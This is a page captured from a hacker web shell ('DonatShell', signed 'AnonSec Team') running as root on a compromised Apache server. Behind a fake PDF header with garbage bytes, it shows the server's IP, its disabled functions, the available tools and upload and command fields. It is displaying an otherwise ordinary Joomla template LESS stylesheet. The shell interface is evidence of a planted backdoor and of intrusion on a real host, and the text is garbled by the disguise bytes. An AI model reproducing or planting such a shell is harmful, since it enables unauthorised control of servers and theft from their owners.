%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/old/templates/sj_icenter/less/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/old/templates/sj_icenter/less//joomla-core.less
// --* Generic Base Joomla  *----------------------
// -----------------------------------------------
/*   1.Links Website
 *   2.Icons, Badge
 *   3.Images Element 
 *   4.List Element 
 *   5.Form Elements
 *   6.Tooltip
 *   7.Table Elements
 *   8.System Message
 * 
 */

// 1.Links Website
// -------------------------
a{color: @linkColor;.transition(color 0.15s ease-in-out 0s);}
a:hover{color: @linkColorHover;text-decoration: none;}
a:focus{outline: none;text-decoration: none;}

// 2.Icons, Badge
// -------------------------
[class^="icon-"], [class*=" icon-"]{margin-right: 5px;}
button.btn [class^="icon-"]{margin: 0;}
.badge,.label{display: inline-block;}

// 3.Images Element 
// ------------------------
div.img_caption {position: relative;
	&.left{margin: 0 1em 1em 0;}
	p.img_caption{font-size: 92%;font-weight: bold;padding: 5px 0 0;margin: 0;.box-sizing(border-box);background: @grayLighter;border: 1px solid @paginationBorder; border-top:none;box-shadow: 0 -1px 0 @white inset;  }
}
div.caption{margin: 0 1em 1em 0;float: left;}
div.yt-lightbox a img{width: auto;}

// 4.List Element 
// ------------------------
ul li{line-height: 24px;}
ul ul{list-style: disc;}
ul.blank, ul.thumbnails{list-style: none;margin: 0;padding: 0;}

ul.latestnews.yt-list{margin: -10px -15px;
	li:last-child{border-bottom: none;}
	li{border-bottom: 1px solid @tableBackgroundHover;padding: 4px 15px;
		&:hover{color: @linkColor;background: @tableBackgroundHover;}
			a{color: @gray;
			&:hover{color: @linkColor;}
		}
	}
}

// 5.Form Elements
// -------------------------

select{padding: 5px 6px;}
#modlgn-remember{margin-top: 0;}
input[type="radio"], input[type="checkbox"]{margin-top: 3px;}
input:focus:required:invalid:focus,
textarea:focus:required:invalid:focus,
select:focus:required:invalid:focus{
	border-color: lighten(@linkColor,20%);
}
input[type="text"]:focus ,textarea:focus, input[type="password"]:focus, input[type="datetime"]:focus,
input[type="datetime-local"], input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus,
input[type="week"]:focus, input[type="number"]:focus,input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus,
input[type="tel"]:focus, input[type="submit"]:focus,select:focus, input[type="file"]:focus,
input[type="radio"]:focus, input[type="checkbox"]:focus,.btn:focus,
button[type="submit"]{ 
  outline: 0 none;
}
label, input, button, select, textarea {font-size: 12px;}
textarea, input[type="text"], input[type="password"], input[type="datetime"],
input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"],
input[type="week"], input[type="number"],input[type="email"], input[type="url"], input[type="search"],
input[type="tel"], input[type="color"], .uneditable-input{
	border-radius: 0;font-size: 12px;.box-shadow( 0 1px 0 @white inset);#gradient .vertical-three-colors(#F7F7F7,@white,50%,@white);
	padding: 7px 10px;border-color: @inputBorder;.box-sizing(content-box);
	filter: none;
}
.form-horizontal .controls input{width:250px;}
.form-horizontal .control-group{margin-bottom: 15px;}

.btn-large{font-size: 16.25px;padding: 9px 19px;}
.button,button{
        background: @background1;color: @white;text-shadow: none;padding: 8px 20px;font-size: 100%;display: inline-block;vertical-align: top;
	border: none;.border-radius(3px);
	
	&:hover{background:@linkColorHover;color:@white;}
}

.form-horizontal .control-label{text-align: left;}
form.box {
    fieldset {border: 1px solid @inputBorder;padding: 0 10px 10px;}
    legend{background: @white;padding: 0 10px;width: auto;border: none;margin: 0;font-size: 110%;line-height: 100%;}
}
.display-limit{padding: 1em 0;overflow: hidden;}
.form-inline .input-append .add-on i{margin: 0 !important;}
.collapse{overflow: hidden;}
.form-inline .btn-primary .icon-search{vertical-align: 1px;}

// 6.Tooltip 
// -----------------------
.tooltip{background: none;border: none;}
div.tooltip.fade {background: transparent;border: none;}
.tip-wrap{z-index: 999;
    .tip {max-width: 350px;padding: 0px;border: 1px solid @gray;background: @grayLighter;
        &.badge-info{background-color: @btnInfoBackgroundHighlight;padding: 2px 6px;border: none;box-shadow: 0;display: inline-block;position: relative;top:-2px;}
        .tip-title {background: @gray;font-size: 12px;color:@white;line-height: 20px;padding: 5px 10px;font-weight: bold;}
        .tip-text {color: @grayDark;font-size: 108%;padding: 5px 10px;}
    }
}

// 7.Table Elements
// --------------------------
table.category{width:100%;
    thead{background:@grayLighter;
        tr{
            th{background: @gray;border-bottom: 2px solid @grayDark;font-size: 118%;color: @white;padding: 8px;text-align: left;
                a{color: @white;}
            }
        }
    }
     tbody{
			tr{
            &:hover td{background-color:@tableBackgroundHover ;}
		  td{padding: 8px;border-top: 1px solid @paginationBorder;
			&.list-hits,&.hits{font-weight: bold;}
		   }
         }
    }
    
}
#recaptcha_response_field{border-color: @paginationBorder !important;}

// 8.Unpublished
// --------------------------
.system-unpublished .system-unpublished {margin: -10px;padding: 10px;border-top: 16px solid;border-bottom: 5px solid;position: relative;}
.system-unpublished .system-unpublished:before {content: 'Unpublished';text-transform: uppercase;top: -19px;left: 10px;position: absolute;font-size: 0.8em;font-weight: bold;}
span.highlight{background-color: @orange !important;.border-radius(3px);color: @grayDark;}
#system-message{margin: 0;}





Anon7 - 2022
AnonSec Team